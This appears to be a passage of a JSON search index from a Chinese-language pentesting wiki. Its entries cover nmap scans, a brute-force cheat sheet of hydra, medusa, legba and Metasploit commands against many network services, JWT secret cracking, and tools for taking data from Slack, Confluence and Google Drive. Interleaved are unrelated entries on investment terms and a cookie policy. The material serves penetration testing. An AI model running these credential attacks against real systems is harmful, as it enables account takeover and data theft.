Shodan","id":"10499","title":"Shodan"},"105":{"body":"开放 端口: SYN --> SYN/ACK --> RST 关闭 端口: SYN --> RST/ACK 被过滤 端口: SYN --> [没有响应] 被过滤 端口: SYN --> ICMP 消息 bash # Nmap fast scan for the most 1000tcp ports used\\nnmap -sV -sC -O -T4 -n -Pn -oA fastscan \\n# Nmap fast scan for all the ports\\nnmap -sV -sC -O -T4 -n -Pn -p- -oA fullfastscan \\n# Nmap fast scan for all the ports slower to avoid failures due to -T4\\nnmap -sV -sC -O -p- -n -Pn -oA fullscan #Bettercap Scan\\nsyn.scan 192.168.1.0/24 1 10000 #Ports 1-10000","breadcrumbs":"Pentesting Network » TCP","id":"105","title":"TCP"},"1050":{"body":"一个词表生成工具,允许您提供一组单词,使您能够从给定的单词中制作多个变体,创建一个独特且理想的词表,以便针对特定目标使用。 bash python3 wister.py -w jane doe 2022 summer madrid 1998 -c 1 2 3 4 5 -o wordlist.lst __ _______ _____ _______ ______ _____\\n\\\\ \\\\ / /_ _|/ ____|__ __| ____| __ \\\\\\n\\\\ \\\\ /\\\\ / / | | | (___ | | | |__ | |__) |\\n\\\\ \\\\/ \\\\/ / | | \\\\___ \\\\ | | | __| | _ /\\n\\\\ /\\\\ / _| |_ ____) | | | | |____| | \\\\ \\\\\\n\\\\/ \\\\/ |_____|_____/ |_| |______|_| \\\\_\\\\ Version 1.0.3 Cycurity Generating wordlist...\\n[########################################] 100%\\nGenerated 67885 lines. Finished in 0.920s.","breadcrumbs":"Brute Force - CheatSheet » Wister","id":"1050","title":"Wister"},"10500":{"body":"与shodan非常相似","breadcrumbs":"Online Platforms with API » Censys","id":"10500","title":"Censys"},"10501":{"body":"通过关键字查找开放的S3桶。","breadcrumbs":"Online Platforms with API » buckets.grayhatwarfare.com","id":"10501","title":"buckets.grayhatwarfare.com"},"10502":{"body":"查找电子邮件甚至域名的泄露凭据 商业?","breadcrumbs":"Online Platforms with API » Dehashed","id":"10502","title":"Dehashed"},"10503":{"body":"搜索电子邮件出现的pastebins。商业?","breadcrumbs":"Online Platforms with API » psbdmp","id":"10503","title":"psbdmp"},"10504":{"body":"获取邮件的声誉。商业?","breadcrumbs":"Online Platforms with API » emailrep.io","id":"10504","title":"emailrep.io"},"10505":{"body":"获取泄露电子邮件的密码。商业?","breadcrumbs":"Online Platforms with API » ghostproject","id":"10505","title":"ghostproject"},"10506":{"body":"从IP获取有趣的信息","breadcrumbs":"Online Platforms with API » Binaryedge","id":"10506","title":"Binaryedge"},"10507":{"body":"通过域名和电子邮件搜索,查看是否被泄露及密码。商业?","breadcrumbs":"Online Platforms with API » haveibeenpwned","id":"10507","title":"haveibeenpwned"},"10508":{"body":"它检测IP地理位置、数据中心、ASN甚至VPN信息。每月提供免费30K查询。","breadcrumbs":"Online Platforms with API » IP2Location.io","id":"10508","title":"IP2Location.io"},"10509":{"body":"IP地理位置和OISNT,具有针对性的数据点。非商业。 https://dnsdumpster.com/ (在商业工具中?) https://www.netcraft.com/ (在商业工具中?) https://www.nmmapper.com/sys/tools/subdomainfinder/ (在商业工具中?) tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Online Platforms with API » IPQuery.io","id":"10509","title":"IPQuery.io"},"1051":{"body":"","breadcrumbs":"Brute Force - CheatSheet » pydictor","id":"1051","title":"pydictor"},"10510":{"body":"Reading time: 3 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。 如果在某个时刻你发现一个 根据你的会话呈现敏感信息的网页 :也许它反映了 cookies,或者打印了信用卡详情或其他任何敏感信息,你可以尝试窃取它。 在这里,我向你展示主要的几种尝试实现这一目标的方法: CORS 绕过 :如果你可以绕过 CORS 头,你将能够通过对恶意页面执行 Ajax 请求来窃取信息。 XSS :如果你在页面上发现 XSS 漏洞,你可能能够利用它来窃取信息。 悬挂标记 :如果你无法注入 XSS 标签,你仍然可以使用其他常规 HTML 标签来窃取信息。 点击劫持 :如果没有针对这种攻击的保护,你可能能够欺骗用户向你发送敏感数据(示例 在这里 )。 tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Stealing Sensitive Information Disclosure from a Web » 从网页窃取敏感信息泄露","id":"10510","title":"从网页窃取敏感信息泄露"},"10511":{"body":"tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。 PEASS-ng : 这些脚本除了寻找 PE 向量外,还会在文件系统中查找敏感信息。 LaZagne : LaZagne 项目 是一个开源应用程序,用于 检索存储在本地计算机上的大量密码 。每个软件使用不同的技术(明文、API、自定义算法、数据库等)存储其密码。该工具的开发目的是查找最常用软件的这些密码。","breadcrumbs":"Post Exploitation » 本地 l00t","id":"10511","title":"本地 l00t"},"10512":{"body":"Conf-Thief : 此模块将使用访问令牌连接到 Confluence 的 API,导出为 PDF,并下载目标可以访问的 Confluence 文档。 GD-Thief : 红队工具,用于通过 Google Drive API 从目标的 Google Drive 中提取文件,攻击者可以访问这些文件。这包括所有共享文件、所有共享驱动器中的文件,以及目标可以访问的域驱动器中的所有文件。 GDir-Thief : 红队工具,用于通过 Google 的 People API 提取您可以访问的目标组织的 Google 人员目录。 SlackPirate : 这是一个用 Python 开发的工具,利用原生 Slack API 从给定访问令牌的 Slack 工作区中提取“有趣”的信息。 Slackhound : Slackhound 是一个命令行工具,供红队和蓝队快速对 Slack 工作区/组织进行侦察。Slackhound 使组织的用户、文件、消息等的收集快速可搜索,并将大型对象写入 CSV 以供离线审查。 tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Post Exploitation » 外部服务","id":"10512","title":"外部服务"},"10513":{"body":"Reading time: 8 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Investment Terms » 投资术语","id":"10513","title":"投资术语"},"10514":{"body":"这是进行交易的最基本方式。您可以 指明资产的数量和您想要买入或卖出的价格 ,一旦达到该价格,操作就完成了。 通常,您还可以使用 当前市场价格 以尽可能快地进行交易。 止损 - 限制 :您还可以指明买入或卖出的资产数量和价格,同时指明一个较低的价格以便在达到时买入或卖出(以止损)。","breadcrumbs":"Investment Terms » 现货","id":"10514","title":"现货"},"10515":{"body":"期货是一种合同,其中两方达成协议 在未来以固定价格获取某物 。例如,在6个月内以70,000美元出售1个比特币。 显然,如果到6个月时比特币的价值为80,000美元,卖方将亏损,而买方将获利。如果到6个月时比特币的价值为60,000美元,则情况正好相反。 然而,这对例如正在生产产品并需要确保能够以支付成本的价格出售的企业来说是有趣的。或者希望在未来确保某些东西的固定价格的企业,即使价格更高。 尽管在交易所中,这通常用于尝试获利。 请注意,“多头头寸”意味着某人押注价格将上涨 而“空头头寸”意味着某人押注价格将下跌","breadcrumbs":"Investment Terms » 期货","id":"10515","title":"期货"},"10516":{"body":"如果基金经理担心某些股票会下跌,他可能会对一些资产(如比特币或标准普尔500期货合约)采取空头头寸。这类似于购买或持有一些资产并创建一个在未来以更高价格出售这些资产的合同。 如果价格下跌,基金经理将获利,因为他将以更高的价格出售资产。如果资产的价格上涨,经理将无法获得该收益,但他仍将保留他的资产。","breadcrumbs":"Investment Terms » 使用期货对冲","id":"10516","title":"使用期货对冲"},"10517":{"body":"这些是“期货”,将无限期持续 (没有结束合同日期)。在加密货币交易所中,您可以根据加密货币的价格进出期货,这种情况非常常见。 请注意,在这些情况下,收益和损失可以实时发生,如果价格上涨1%,您将赢得1%;如果价格下跌1%,您将损失1%。","breadcrumbs":"Investment Terms » 永续期货","id":"10517","title":"永续期货"},"10518":{"body":"杠杆 允许您用较少的资金控制市场中的更大头寸。它基本上允许您“押注”比您拥有的更多的钱,仅冒您实际拥有的资金的风险。 例如,如果您以100美元的50倍杠杆在BTC/USDT中开设期货头寸,这意味着如果价格上涨1%,您将赢得1x50 = 50%的初始投资(50美元)。因此,您将拥有150美元。 然而,如果价格下跌1%,您将损失50%的资金(在这种情况下为59美元)。如果价格下跌2%,您将失去所有的押注(2x50 = 100%)。 因此,杠杆允许您控制您押注的金额,同时增加收益和损失。","breadcrumbs":"Investment Terms » 带杠杆的期货","id":"10518","title":"带杠杆的期货"},"10519":{"body":"期货和期权之间的主要区别在于合同对买方是可选的:他可以决定是否执行(通常只有在他能从中受益时才会执行)。如果买方希望使用期权,卖方必须出售。 然而,买方将向卖方支付一些费用以开设期权(因此,表面上承担更多风险的卖方开始赚取一些钱)。","breadcrumbs":"Investment Terms » 期货与期权的区别","id":"10519","title":"期货与期权的区别"},"1052":{"body":"https://github.com/danielmiessler/SecLists https://github.com/Dormidera/WordList-Compendium https://github.com/kaonashi-passwords/Kaonashi https://github.com/google/fuzzing/tree/master/dictionaries https://crackstation.net/crackstation-wordlist-password-cracking-dictionary.htm https://weakpass.com/wordlist/ https://wordlists.assetnote.io/ https://github.com/fssecur3/fuzzlists https://hashkiller.io/listmanager https://github.com/Karanxa/Bug-Bounty-Wordlists","breadcrumbs":"Brute Force - CheatSheet » 字典列表","id":"1052","title":"字典列表"},"10520":{"body":"期货: 当您买入或卖出期货合同时,您正在进入一个 具有约束力的协议 ,以在未来某个日期以特定价格买入或卖出资产。买方和卖方都 有义务 在到期时履行合同(除非合同在此之前关闭)。 期权: 在期权中,您有 权利,但没有义务 ,在特定价格之前或在某个到期日以特定价格买入(在 看涨期权 的情况下)或卖出(在 看跌期权 的情况下)资产。 买方 有选择执行的权利,而 卖方 在买方决定行使期权时有义务完成交易。","breadcrumbs":"Investment Terms » 1. 义务与权利:","id":"10520","title":"1. 义务与权利:"},"10521":{"body":"期货: 买方和卖方都承担 无限风险 ,因为他们有义务完成合同。风险是到期日约定价格与市场价格之间的差额。 期权: 买方的风险限于为购买期权支付的 权利金 。如果市场没有朝着期权持有者有利的方向移动,他们可以简单地让期权到期。然而,期权的 卖方 (写手)在市场大幅不利于他们时面临无限风险。","breadcrumbs":"Investment Terms » 2. 风险:","id":"10521","title":"2. 风险:"},"10522":{"body":"期货: 除了持有头寸所需的保证金外,没有其他前期成本,因为买方和卖方都有义务完成交易。 期权: 买方必须为行使期权支付 期权权利金 。这个权利金本质上是期权的成本。","breadcrumbs":"Investment Terms » 3. 成本:","id":"10522","title":"3. 成本:"},"10523":{"body":"期货: 利润或损失基于到期时市场价格与合同中约定价格之间的差额。 期权: 当市场在超过支付的权利金的行使价格上有利移动时,买方获利。如果期权未被行使,卖方通过保留权利金获利。 tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Investment Terms » 4. 利润潜力:","id":"10523","title":"4. 利润潜力:"},"10524":{"body":"Reading time: 3 minutes 最后更新:02/04/2023","breadcrumbs":"Cookies Policy » Cookies Policy","id":"10524","title":"Cookies Policy"},"10525":{"body":"本Cookies政策适用于HackTricks团队(“HackTricks”,“我们”,“我们”或“我们的”)拥有和运营的以下网站: hacktricks.wiki www.hacktricks.wiki book.hacktricks.wiki cloud.hacktricks.wiki 通过使用这些网站中的任何一个,您同意根据本Cookies政策使用cookies。如果您不同意,请在浏览器设置中禁用cookies或避免使用我们的网站。","breadcrumbs":"Cookies Policy » Introduction","id":"10525","title":"Introduction"},"10526":{"body":"Cookies是当您访问网站时存储在您的计算机或移动设备上的小文本文件。它们被广泛用于使网站正常工作、改善其功能并提供更个性化的用户体验。","breadcrumbs":"Cookies Policy » What are cookies?","id":"10526","title":"What are cookies?"},"10527":{"body":"我们在我们的网站上使用cookies,目的如下: Essential cookies: 这些cookies对于我们网站的基本功能是必要的,例如启用用户身份验证、维护安全性和记住您的偏好。 Performance cookies: 这些cookies帮助我们了解访客如何与我们的网站互动,通过匿名收集和报告信息。这使我们能够改善网站性能和用户体验。 Functionality cookies: 这些cookies使我们的网站能够记住您所做的选择,例如您的语言或地区,以提供更个性化的体验。 Targeting/advertising cookies: 这些cookies用于根据您的兴趣、浏览历史和与我们网站的互动提供相关广告和营销通讯。 此外,页面book.hacktricks.wiki和cloud.hacktricks.wiki托管在Gitbook上。您可以在 https://gitbook-1652864889.teamtailor.com/cookie-policy 找到有关Gitbook cookies的更多信息。","breadcrumbs":"Cookies Policy » How we use cookies","id":"10527","title":"How we use cookies"},"10528":{"body":"除了我们自己的cookies,我们还可能使用第三方cookies来报告网站使用统计信息、投放广告和启用社交媒体分享按钮。使用第三方cookies受其各自隐私政策的约束。 Managing cookies 大多数网络浏览器允许您通过其设置管理cookies。您可以选择阻止、删除或限制设备上cookies的使用。然而,请注意,禁用cookies可能会影响我们网站的功能和性能。 Changes to this Cookies Policy 我们可能会不时更新本Cookies政策,以反映我们做法或相关法律的变化。我们鼓励您定期查看此页面,以获取有关我们cookie做法的最新信息。","breadcrumbs":"Cookies Policy » Third-party cookies","id":"10528","title":"Third-party cookies"},"10529":{"body":"如果您对本Cookies政策有任何疑问或担忧,请通过 support@hacktricks.xyz 与我们联系。","breadcrumbs":"Cookies Policy » Contact us","id":"10529","title":"Contact us"},"1053":{"body":"按服务名称字母顺序排列。","breadcrumbs":"Brute Force - CheatSheet » 服务","id":"1053","title":"服务"},"1054":{"body":"bash nmap -p 548 --script afp-brute \\nmsf> use auxiliary/scanner/afp/afp_login\\nmsf> set BLANK_PASSWORDS true\\nmsf> set USER_AS_PASS true\\nmsf> set PASS_FILE \\nmsf> set USER_FILE \\nmsf> run","breadcrumbs":"Brute Force - CheatSheet » AFP","id":"1054","title":"AFP"},"1055":{"body":"bash nmap --script ajp-brute -p 8009 ","breadcrumbs":"Brute Force - CheatSheet » AJP","id":"1055","title":"AJP"},"1056":{"body":"bash legba amqp --target localhost:5672 --username admin --password data/passwords.txt [--amql-ssl]","breadcrumbs":"Brute Force - CheatSheet » AMQP (ActiveMQ, RabbitMQ, Qpid, JORAM 和 Solace)","id":"1056","title":"AMQP (ActiveMQ, RabbitMQ, Qpid, JORAM 和 Solace)"},"1057":{"body":"bash nmap --script cassandra-brute -p 9160 \\n# legba ScyllaDB / Apache Casandra\\nlegba scylla --username cassandra --password wordlists/passwords.txt --target localhost:9042","breadcrumbs":"Brute Force - CheatSheet » 卡桑德拉","id":"1057","title":"卡桑德拉"},"1058":{"body":"bash msf> use auxiliary/scanner/couchdb/couchdb_login\\nhydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst localhost -s 5984 http-get /","breadcrumbs":"Brute Force - CheatSheet » CouchDB","id":"1058","title":"CouchDB"},"1059":{"body":"hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst 10.10.10.10 -s 5000 https-get /v2/","breadcrumbs":"Brute Force - CheatSheet » Docker 注册表","id":"1059","title":"Docker 注册表"},"106":{"body":"有 2 种选项可以扫描 UDP 端口: 发送一个 UDP packet ,并检查是否收到 ICMP unreachable 响应以判断端口是否为 closed (在多种情况下 ICMP 会被 filtered ,所以你不会收到端口是 closed 还是 open 的任何信息)。 发送 formatted datagrams 去触发 service 的响应(例如 DNS、DHCP、TFTP 等,详见 nmap-payloads )。如果你收到 response ,则该端口为 open 。 Nmap 将使用 \\"-sV\\" 把这两种选项 mix both (UDP scans 非常慢),但请注意 UDP scans 比 TCP scans 更慢: bash # Check if any of the most common udp services is running\\nudp-proto-scanner.pl \\n# Nmap fast check if any of the 100 most common UDP services is running\\nnmap -sU -sV --version-intensity 0 -n -F -T4 \\n# Nmap check if any of the 100 most common UDP services is running and launch defaults scripts\\nnmap -sU -sV -sC -n -F -T4 \\n# Nmap \\"fast\\" top 1000 UDP ports\\nnmap -sU -sV --version-intensity 0 -n -T4 \\n# You could use nmap to test all the UDP ports, but that will take a lot of time","breadcrumbs":"Pentesting Network » UDP","id":"106","title":"UDP"},"1060":{"body":"hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst localhost -s 9200 http-get /","breadcrumbs":"Brute Force - CheatSheet » Elasticsearch","id":"1060","title":"Elasticsearch"},"1061":{"body":"bash hydra -l root -P passwords.txt [-t 32] ftp\\nncrack -p 21 --user root -P passwords.txt [-T 5]\\nmedusa -u root -P 500-worst-passwords.txt -h -M ftp\\nlegba ftp --username admin --password wordlists/passwords.txt --target localhost:21","breadcrumbs":"Brute Force - CheatSheet » FTP","id":"1061","title":"FTP"},"1062":{"body":"WFuzz","breadcrumbs":"Brute Force - CheatSheet » HTTP 通用暴力破解","id":"1062","title":"HTTP 通用暴力破解"},"1063":{"body":"bash hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst sizzle.htb.local http-get /certsrv/\\n# Use https-get mode for https\\nmedusa -h -u -P -M http -m DIR:/path/to/auth -T 10\\nlegba http.basic --username admin --password wordlists/passwords.txt --target http://localhost:8888/","breadcrumbs":"Brute Force - CheatSheet » HTTP 基本认证","id":"1063","title":"HTTP 基本认证"},"1064":{"body":"bash legba http.ntlm1 --domain example.org --workstation client --username admin --password wordlists/passwords.txt --target https://localhost:8888/\\nlegba http.ntlm2 --domain example.org --workstation client --username admin --password wordlists/passwords.txt --target https://localhost:8888/","breadcrumbs":"Brute Force - CheatSheet » HTTP - NTLM","id":"1064","title":"HTTP - NTLM"},"1065":{"body":"bash hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst domain.htb http-post-form \\"/path/index.php:name=^USER^&password=^PASS^&enter=Sign+in:Login name or password is incorrect\\" -V\\n# Use https-post-form mode for https 对于 http s ,您必须将 \\"http-post-form\\" 更改为 \\" https-post-form \\"","breadcrumbs":"Brute Force - CheatSheet » HTTP - Post 表单","id":"1065","title":"HTTP - Post 表单"},"1066":{"body":"bash cmsmap -f W/J/D/M -u a -p a https://wordpress.com\\n# Check also https://github.com/evilsocket/legba/wiki/HTTP","breadcrumbs":"Brute Force - CheatSheet » HTTP - CMS -- (W)ordpress, (J)oomla 或 (D)rupal 或 (M)oodle","id":"1066","title":"HTTP - CMS -- (W)ordpress, (J)oomla 或 (D)rupal 或 (M)oodle"},"1067":{"body":"bash hydra -l USERNAME -P /path/to/passwords.txt -f imap -V\\nhydra -S -v -l USERNAME -P /path/to/passwords.txt -s 993 -f imap -V\\nnmap -sV --script imap-brute -p \\nlegba imap --username user --password data/passwords.txt --target localhost:993","breadcrumbs":"Brute Force - CheatSheet » IMAP","id":"1067","title":"IMAP"},"1068":{"body":"bash nmap -sV --script irc-brute,irc-sasl-brute --script-args userdb=/path/users.txt,passdb=/path/pass.txt -p ","breadcrumbs":"Brute Force - CheatSheet » IRC","id":"1068","title":"IRC"},"1069":{"body":"bash nmap -sV --script iscsi-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 3260 ","breadcrumbs":"Brute Force - CheatSheet » ISCSI","id":"1069","title":"ISCSI"},"107":{"body":"SCTP (Stream Control Transmission Protocol) 旨在与 TCP (Transmission Control Protocol) 和 UDP (User Datagram Protocol) 一起使用。它的主要目的是促进电话数据在 IP 网络上的传输,借鉴了 Signaling System 7 (SS7) 中的许多可靠性特性。SCTP 是 SIGTRAN 协议族的核心组件,该协议族旨在将 SS7 信号通过 IP 网络传输。 多种操作系统(如 IBM AIX、Oracle Solaris、HP-UX、Linux、Cisco IOS 和 VxWorks)均提供对 SCTP 的支持,表明它在电信和网络领域被广泛接受并且非常有用。 nmap 为 SCTP 提供两种不同的扫描: -sY 和 -sZ bash # Nmap fast SCTP scan\\nnmap -T4 -sY -n -oA SCTFastScan \\n# Nmap all SCTP scan\\nnmap -T4 -p- -sY -sV -sC -F -n -oA SCTAllScan ","breadcrumbs":"Pentesting Network » SCTP Scan","id":"107","title":"SCTP Scan"},"1070":{"body":"bash #hashcat\\nhashcat -m 16500 -a 0 jwt.txt .\\\\wordlists\\\\rockyou.txt #https://github.com/Sjord/jwtcrack\\npython crackjwt.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc /usr/share/wordlists/rockyou.txt #John\\njohn jwt.txt --wordlist=wordlists.txt --format=HMAC-SHA256 #https://github.com/ticarpi/jwt_tool\\npython3 jwt_tool.py -d wordlists.txt #https://github.com/brendan-rius/c-jwt-cracker\\n./jwtcrack eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc 1234567890 8 #https://github.com/mazen160/jwt-pwn\\npython3 jwt-cracker.py -jwt eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc -w wordlist.txt #https://github.com/lmammino/jwt-cracker\\njwt-cracker \\"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWV9.TJVA95OrM7E2cBab30RMHrHDcEfxjoYZgeFONFh7HgQ\\" \\"abcdefghijklmnopqrstuwxyz\\" 6","breadcrumbs":"Brute Force - CheatSheet » JWT","id":"1070","title":"JWT"},"1071":{"body":"bash nmap --script ldap-brute -p 389 \\nlegba ldap --target 127.0.0.1:389 --username admin --password @wordlists/passwords.txt --ldap-domain example.org --single-match","breadcrumbs":"Brute Force - CheatSheet » LDAP","id":"1071","title":"LDAP"},"1072":{"body":"ncrack mqtt://127.0.0.1 --user test –P /root/Desktop/pass.txt -v\\nlegba mqtt --target 127.0.0.1:1883 --username admin --password wordlists/passwords.txt","breadcrumbs":"Brute Force - CheatSheet » MQTT","id":"1072","title":"MQTT"},"1073":{"body":"bash nmap -sV --script mongodb-brute -n -p 27017 \\nuse auxiliary/scanner/mongodb/mongodb_login\\nlegba mongodb --target localhost:27017 --username root --password data/passwords.txt","breadcrumbs":"Brute Force - CheatSheet » Mongo","id":"1073","title":"Mongo"},"1074":{"body":"MSSQLPwner shell # Bruteforce using tickets, hashes, and passwords against the hosts listed on the hosts.txt\\nmssqlpwner hosts.txt brute -tl tickets.txt -ul users.txt -hl hashes.txt -pl passwords.txt # Bruteforce using hashes, and passwords against the hosts listed on the hosts.txt\\nmssqlpwner hosts.txt brute -ul users.txt -hl hashes.txt -pl passwords.txt # Bruteforce using tickets against the hosts listed on the hosts.txt\\nmssqlpwner hosts.txt brute -tl tickets.txt -ul users.txt # Bruteforce using passwords against the hosts listed on the hosts.txt\\nmssqlpwner hosts.txt brute -ul users.txt -pl passwords.txt # Bruteforce using hashes against the hosts listed on the hosts.txt\\nmssqlpwner hosts.txt brute -ul users.txt -hl hashes.txt bash legba mssql --username SA --password wordlists/passwords.txt --target localhost:1433","breadcrumbs":"Brute Force - CheatSheet » MSSQL","id":"1074","title":"MSSQL"},"1075":{"body":"bash # hydra\\nhydra -L usernames.txt -P pass.txt mysql # msfconsole\\nmsf> use auxiliary/scanner/mysql/mysql_login; set VERBOSE false # medusa\\nmedusa -h -u -P <-f | to stop medusa on first success attempt> -t -M mysql #Legba\\nlegba mysql --username root --password wordlists/passwords.txt --target localhost:3306","breadcrumbs":"Brute Force - CheatSheet » MySQL","id":"1075","title":"MySQL"},"1076":{"body":"bash patator oracle_login sid= host= user=FILE0 password=FILE1 0=users-oracle.txt 1=pass-oracle.txt -x ignore:code=ORA-01017 ./odat.py passwordguesser -s $SERVER -d $SID\\n./odat.py passwordguesser -s $MYSERVER -p $PORT --accounts-file accounts_multiple.txt #msf1\\nmsf> use admin/oracle/oracle_login\\nmsf> set RHOSTS \\nmsf> set RPORT 1521\\nmsf> set SID #msf2, this option uses nmap and it fails sometimes for some reason\\nmsf> use scanner/oracle/oracle_login\\nmsf> set RHOSTS \\nmsf> set RPORTS 1521\\nmsf> set SID #for some reason nmap fails sometimes when executing this script\\nnmap --script oracle-brute -p 1521 --script-args oracle-brute.sid= legba oracle --target localhost:1521 --oracle-database SYSTEM --username admin --password data/passwords.txt 为了使用 oracle_login 和 patator ,您需要 安装 : bash pip3 install cx_Oracle --upgrade 离线 OracleSQL 哈希暴力破解 ( 版本 11.1.0.6, 11.1.0.7, 11.2.0.1, 11.2.0.2, 和 11.2.0.3 ): bash nmap -p1521 --script oracle-brute-stealth --script-args oracle-brute-stealth.sid=DB11g -n 10.11.21.30","breadcrumbs":"Brute Force - CheatSheet » OracleSQL","id":"1076","title":"OracleSQL"},"1077":{"body":"bash hydra -l USERNAME -P /path/to/passwords.txt -f pop3 -V\\nhydra -S -v -l USERNAME -P /path/to/passwords.txt -s 995 -f pop3 -V # Insecure\\nlegba pop3 --username admin@example.com --password wordlists/passwords.txt --target localhost:110 # SSL\\nlegba pop3 --username admin@example.com --password wordlists/passwords.txt --target localhost:995 --pop3-ssl","breadcrumbs":"Brute Force - CheatSheet » POP","id":"1077","title":"POP"},"1078":{"body":"bash hydra -L /root/Desktop/user.txt –P /root/Desktop/pass.txt postgres\\nmedusa -h –U /root/Desktop/user.txt –P /root/Desktop/pass.txt –M postgres\\nncrack –v –U /root/Desktop/user.txt –P /root/Desktop/pass.txt :5432\\npatator pgsql_login host= user=FILE0 0=/root/Desktop/user.txt password=FILE1 1=/root/Desktop/pass.txt\\nuse auxiliary/scanner/postgres/postgres_login\\nnmap -sV --script pgsql-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 5432 \\nlegba pgsql --username admin --password wordlists/passwords.txt --target localhost:5432","breadcrumbs":"Brute Force - CheatSheet » PostgreSQL","id":"1078","title":"PostgreSQL"},"1079":{"body":"您可以从 https://http.kali.org/pool/main/t/thc-pptp-bruter/ 下载 .deb 包进行安装。 bash sudo dpkg -i thc-pptp-bruter*.deb #Install the package\\ncat rockyou.txt | thc-pptp-bruter –u ","breadcrumbs":"Brute Force - CheatSheet » PPTP","id":"1079","title":"PPTP"},"108":{"body":"IDS and IPS Evasion","breadcrumbs":"Pentesting Network » IDS 和 IPS 绕过","id":"108","title":"IDS 和 IPS 绕过"},"1080":{"body":"bash ncrack -vv --user -P pwds.txt rdp://\\nhydra -V -f -L -P rdp://\\nlegba rdp --target localhost:3389 --username admin --password data/passwords.txt [--rdp-domain ] [--rdp-ntlm] [--rdp-admin-mode] [--rdp-auto-logon]","breadcrumbs":"Brute Force - CheatSheet » RDP","id":"1080","title":"RDP"},"1081":{"body":"bash msf> use auxiliary/scanner/redis/redis_login\\nnmap --script redis-brute -p 6379 \\nhydra –P /path/pass.txt redis://: # 6379 is the default\\nlegba redis --target localhost:6379 --username admin --password data/passwords.txt [--redis-ssl]","breadcrumbs":"Brute Force - CheatSheet » 